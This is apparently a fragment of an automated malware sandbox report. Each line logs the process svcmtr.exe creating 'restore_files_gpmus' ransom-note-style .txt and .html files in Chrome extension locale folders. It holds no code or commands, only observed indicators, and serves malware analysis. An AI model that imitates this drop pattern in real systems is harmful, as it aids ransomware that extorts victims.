Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\it\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\ja\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\ja\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\ko\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\ko\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\lt\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\lt\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\lv\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\lv\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\ms\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\ms\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\nl\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\nl\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\no\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\no\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\pl\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\pl\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\pt_BR\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\pt_BR\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\pt_PT\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\pt_PT\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\ro\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\ro\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\ru\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\ru\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\sk\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\sk\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\sl\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\sl\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\sr\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\sr\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\sv\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\sv\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\th\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\th\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\tr\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\tr\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\uk\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\uk\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\vi\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\vi\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\zh_CN\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\zh_CN\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\zh_TW\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\zh_TW\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_metadata\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_metadata\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\ar\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\ar\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\bg\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\bg\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\ca\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\ca\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\cs\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\cs\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\da\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\da\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\de\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\de\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\el\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\el\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\en_GB\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\en_GB\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\en_US\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\en_US\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\es\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\es\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\es_419\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\es_419\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\et\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\et\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\eu\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\eu\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\fi\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\fi\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\fil\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\fil\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\fr\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\fr\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\he\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\he\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\hi\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\hi\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\hr\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\hr\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\hu\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\hu\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\id\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\id\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\it\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\it\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\ja\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\ja\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\ko\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\ko\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\lt\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\lt\restore_files_gpmus.htmlJump to behavior
